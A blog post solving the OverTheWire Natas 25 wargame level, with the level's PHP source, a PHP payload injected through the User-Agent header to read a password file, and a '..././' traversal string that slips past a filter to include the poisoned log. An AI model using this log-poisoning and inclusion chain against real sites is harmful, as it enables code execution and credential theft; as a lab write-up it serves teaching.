DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Sunday, December 15, 2013

OverTheWire Natas 25

Code inspection first ! 
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/tmp/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
    }
logRequest function let us append arbitrary content to arbitrary file path. Why ?
1. We control $_SERVER['HTTP_USER_AGENT'] which is the value of the User-Agent HTTP header.
2. We control session_id() by PHPSESSID cookie value.

Let's set User-Agent to be the following:
<?php echo file_get_contents('/etc/natas_webpass/natas26') ?>
and PHPSESSID value to be 'pwned'.

So, what we have done until now: if the logRequest function will be called, a PHP code that will print the next level password will be wrote to the file /tmp/natas25_pwned.log.

The last step is to display this code output. We can do it by including /tmp/natas25_pwned.log file content in the page by exploiting the following function which is called on page loading: 
function setLanguage(){
    /* language setup */
    if(array_key_exists("lang",$_REQUEST))
        if(safeinclude("language/" . $_REQUEST["lang"] ))
            return 1;
    safeinclude("language/en"); 
}

function safeinclude($filename){
    // check for directory traversal
    if(strstr($filename,"../")){
        logRequest("Directory traversal attempt! fixing request.");
        $filename=str_replace("../","",$filename);
    }
    // dont let ppl steal our passwords
    if(strstr($filename,"natas_webpass")){
        logRequest("Illegal file access detected! Aborting!");
        exit(-1);
    }
    // add more checks...

    if (file_exists($filename)) { 
        include($filename);
        return 1;
    }
    return 0;
}

You can see that safeinclude function gives us hard life by removing '../'. To bypass it we will use the following distinction:
'..././' will become '../' after '../' will be removed. Therefore, we can use it to escape from the 'language/' directory and include arbitrary path (/tmp/natas25_pwned.log)
We will set lang GET parameter to be:
lang=..././..././..././..././..././tmp/natas25_pwned.log


It will trigger the logRequest function because there was a directory traversal attempt and the PHP code we saw earlier will be written to the included file.
Pwned ! :)
Labels:

1 comment :

  1. AnonymousAugust 3, 2015 at 2:57 AM

    Thank you very much for not respecting our no spoiler policy. very sad to see this.
    Regards,
    morla, OTW

    ReplyDelete

Subscribe to: Post Comments ( Atom )